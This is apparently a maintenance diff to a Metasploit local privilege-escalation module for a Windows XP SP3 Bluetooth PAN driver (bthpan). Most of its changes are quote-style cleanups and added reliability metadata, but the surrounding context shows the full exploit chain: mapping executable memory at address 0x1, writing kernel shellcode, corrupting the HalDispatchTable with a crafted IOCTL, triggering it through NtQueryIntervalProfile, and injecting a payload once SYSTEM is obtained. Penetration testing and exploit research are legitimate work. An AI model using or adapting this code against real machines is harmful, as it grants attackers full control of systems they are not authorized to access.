@@ -64,6 +64,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_process_memory_write
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
@@ -86,10 +91,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
 
     unless proc.memory.writable?(address)
-      vprint_error("Failed to allocate memory")
+      vprint_error('Failed to allocate memory')
       return nil
     end
     vprint_good("#{address} is now writable")
@@ -97,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Local
     result = proc.memory.write(address, content)
 
     if result.nil?
-      vprint_error("Failed to write contents to memory")
+      vprint_error('Failed to write contents to memory')
       return nil
     end
     vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
@@ -132,14 +137,14 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     # covers both native x64 and WOW64
-    if sysinfo["Architecture"] == ARCH_X64
+    if sysinfo['Architecture'] == ARCH_X64
       return Exploit::CheckCode::Safe
     end
 
-    os = sysinfo["OS"]
-    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
+    version = get_version_info
+    return Exploit::CheckCode::Safe unless version.build_number == Msf::WindowsVersion::XP_SP3
 
-    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\bthpan', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     return Exploit::CheckCode::Safe unless handle
 
     session.railgun.kernel32.CloseHandle(handle)
@@ -153,25 +158,25 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Exploit not available on this system")
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system')
     end
 
-    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\bthpan', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
-      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
+      fail_with(Failure::NoTarget, 'Unable to open \\\\.\\bthpan device')
     end
 
     my_target = targets[0]
-    print_status("Disclosing the HalDispatchTable address...")
+    print_status('Disclosing the HalDispatchTable address...')
     @addresses = disclose_addresses(my_target)
     if @addresses.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
+      fail_with(Failure::Unknown, 'Failed to disclose necessary address for exploitation. Aborting.')
     else
-      print_good("Address successfully disclosed.")
+      print_good('Address successfully disclosed.')
     end
 
-    print_status("Storing the shellcode in memory...")
+    print_status('Storing the shellcode in memory...')
     this_proc = session.sys.process.open
     kernel_shell = ring0_shellcode
     kernel_shell_address = 0x1
@@ -183,28 +188,28 @@ class MetasploitModule < Msf::Exploit::Local
     result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+      fail_with(Failure::Unknown, 'Error while storing the kernel stager shellcode on memory')
     end
     print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
 
-    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
-    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
+    print_status('Triggering the vulnerability, corrupting the HalDispatchTable...')
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses['halDispatchTable'] + 0x4, 0)
     session.railgun.kernel32.CloseHandle(handle)
 
-    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    print_status('Executing the Kernel Stager throw NtQueryIntervalProfile()...')
     session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
 
-    print_status("Checking privileges after exploitation...")
+    print_status('Checking privileges after exploitation...')
 
     unless is_system?
       fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
     end
-    print_good("Privilege escalation successful!")
+    print_good('Privilege escalation successful!')
 
     p = payload.encoded
     print_status("Injecting #{p.length} bytes to memory and executing it...")
     unless execute_shellcode(p)
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
 end
